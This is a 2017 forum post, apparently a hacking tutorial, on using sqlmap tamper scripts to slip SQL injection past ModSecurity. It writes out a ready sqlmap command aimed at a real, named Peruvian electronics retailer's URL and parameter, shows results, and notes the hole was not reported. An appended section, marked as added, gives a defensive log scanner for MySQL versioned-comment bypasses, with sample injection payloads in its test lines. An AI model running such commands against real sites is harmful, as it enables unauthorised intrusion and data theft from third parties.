Evolve Mod_Security with SQLMAP Tampers

Sep 10, 2017 06:27 PM
Sep 10, 2017 06:37 PM

Hello !!

As everyone who has spent some time trying to make an injection through GET in a page knows, sooner or later the famous Mod_Security notice appears and does not let you inject.

[Screenshot: the Mod_Security notice]

But if you thought that was the end of the game, you are very wrong: there will always be SQLMAP to the rescue with its 47 Tampers (the ones that come by default in the latest version), which will get you out of more than one tight spot ;).

For this example we will use "modsecurityversioned.py" (which only works with MySQL).

If you want more information about each one, go to sqlmap/tamper/, where you will find all the available tampers; each file contains an explanation of its functionality.

Using a Tamper in SQLMAP is very simple; you only need to add the option

Code:

--tamper name

We will do the example injection against a Peruvian site that sells electronic articles (I hope it does not bother them) :D.

URL : https://impulso.com.pe

Tool : SQLMAP

Tamper : modsecurityzeroversioned.py

Xploit :

Code:

sqlmap.py -u "https://impulso.com.pe/detalle_marca.php?marca_id=24&cat_id=5" --dbms "MySQL" -p "marca_id" --tamper "modsecurityzeroversioned.py" --batch

Result:

[Screenshot: sqlmap output]

REPORTED : NO
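
Seen from the defending side, the two tampers named above wrap the SQL in a MySQL versioned comment (`/*!NNNNN ... */`), which MySQL executes but a filter that skips comments ignores. The following is an added example, not code from the original post or from sqlmap: a small access-log scanner that flags such comments in query parameters and shows the text as MySQL would read it. The log lines, paths and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# MySQL runs the body of /*!NNNNN ... */ when the server version is >= NNNNN
# (and always for /*! ... */), so a filter that skips comments misses the body.
VERSIONED = re.compile(r"/\*!(\d{5,6})?(.*?)(?:\*/|$)", re.S)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def unwrap(value):
    """Return the value as MySQL reads it: versioned-comment bodies inlined."""
    return VERSIONED.sub(lambda m: " " + m.group(2) + " ", value)

def inspect_url(url):
    """Return [(param, version_or_None, body)] for versioned comments in the query."""
    hits = []
    # parse_qsl URL-decodes names and values, so %2F*%21 is seen as /*!
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for m in VERSIONED.finditer(value):
            hits.append((name, m.group(1), m.group(2).strip()))
    return hits

def scan_log(lines):
    """Return [(line_no, param, version, body)] for each flagged request line."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue  # not a request line in the expected format
        for name, version, body in inspect_url(m.group(1)):
            findings.append((no, name, version, body))
    return findings

# Constructed sample lines (combined log format, documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Sep/2017:18:27:01 +0000] "GET /item.php?id=24&cat=5 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [10/Sep/2017:18:27:09 +0000] "GET /item.php?id=24%20%2F*%2100000AND%202%3E1*%2F&cat=5 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [10/Sep/2017:18:27:12 +0000] "GET /item.php?id=24+/*!30874AND+2>1*/--&cat=5 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [10/Sep/2017:18:28:40 +0000] "GET /css/site.css?v=/*theme*/3 HTTP/1.1" 200 811',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Ordinary comments (`/*theme*/` in the last sample line) are not flagged; only the `/*!` form is, because it is the form MySQL executes.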
